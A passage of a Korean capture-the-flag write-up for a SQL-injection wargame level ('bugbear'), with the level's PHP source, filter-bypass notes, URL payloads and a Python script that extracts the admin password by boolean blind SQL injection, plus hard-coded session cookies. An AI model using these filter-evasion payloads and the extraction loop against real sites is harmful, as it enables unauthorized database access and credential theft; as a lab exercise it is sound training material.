query : {$query}
";
// Runs $query (assembled before this excerpt, so its input handling is not
// visible here) through the legacy mysql_* API. The '@' suppresses any error
// output, so a failing query silently yields false.
$result = @mysql_fetch_array(mysql_query($query));
// When a row came back, its id is echoed early in the response. The page body
// therefore differs by whether the first query matched a row, which is the
// signal the writeup below relies on.
if($result['id']) echo "Hello {$result[id]}
";
// addslashes() escapes quotes in pw only; no escaping for other parameters
// is applied at this point.
$_GET[pw] = addslashes($_GET[pw]);
// pw is still interpolated straight into SQL; escaping characters is not a
// substitute for a parameterized query.
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
// solve() fires only when the stored pw equals the submitted pw exactly.
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
// Echoes this file's own source into the response.
highlight_file(__FILE__);
?>pw에는 ' 필터링 되어있다.
no에는 ', substr, ascii, =, or, and, 공백, like, 0x가 필터링되어 있다.
substr 필터링->right left 이용
like와 =이 모두 필터링 되었으므로 in을 사용!
0x가 필터링되었으므로 0b를 이용!
and 필터링-> %26%26
or 필터링->||
Blind SQL injection으로 패스워드 길이와 패스워드 자체를 알아낸다!
?pw=1&no=123||id%0din%0d(0b0110000101100100011011010110100101101110)%26%26length(pw)in(8)
?pw=1&no=123||id%0din%0d(0b0110000101100100011011010110100101101110)%26%26right(left(pw,3),1)>char(50)
import requests
def main():
    # Driver for the boolean-based blind SQL injection described above: it
    # recovers the admin pw of the "bugbear" page one character at a time by
    # asking the server a yes/no question per (position, character) pair.
    # NOTE(review): the cookie values below are session credentials committed
    # to source; they belong in an environment variable or a local config file.
    cookie={"__cfduid":"d282347679afbe7ce118657ef96dd67f61530072154","PHPSESSID":"25bfqp0uqr6pmep83spki2t522"}
    query='https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php'
    # Positions 1..8 — presumably fixed by the length(pw)in(8) probe shown
    # above; the length is not re-checked here.
    for i in range(1,9):
        x=30
        # x is stepped upward and the oracle is asked "is pw[i] > char(x)?".
        # There is no upper bound: if the response never changes (e.g. the
        # session expires and the page stops answering), this loop never ends.
        while(1):
            x+=1
            query_add=query+"?pw=1&no=123||id%0din%0d(0b0110000101100100011011010110100101101110)%26%26right(left(pw,"+str(i)+"),1)>char("+str(x)+")"
            result=requests.get(query_add, cookies=cookie)
            # "Hello" is also present in the highlighted PHP source, so the
            # first occurrence sits far into the page when the early echo did
            # not fire. An index > 1000 thus looks like "pw[i] > char(x) is
            # false"; since every smaller x passed, pw[i] == chr(x) — the
            # threshold is page-layout dependent, confirm before reuse.
            if(result.text.find("Hello")>1000):
                print("GOOD "+str(i)+": "+chr(x))
                break
            # print(str(x))
if __name__ == "__main__":
    # Script entry point: run the extraction loop only when executed directly.
    main()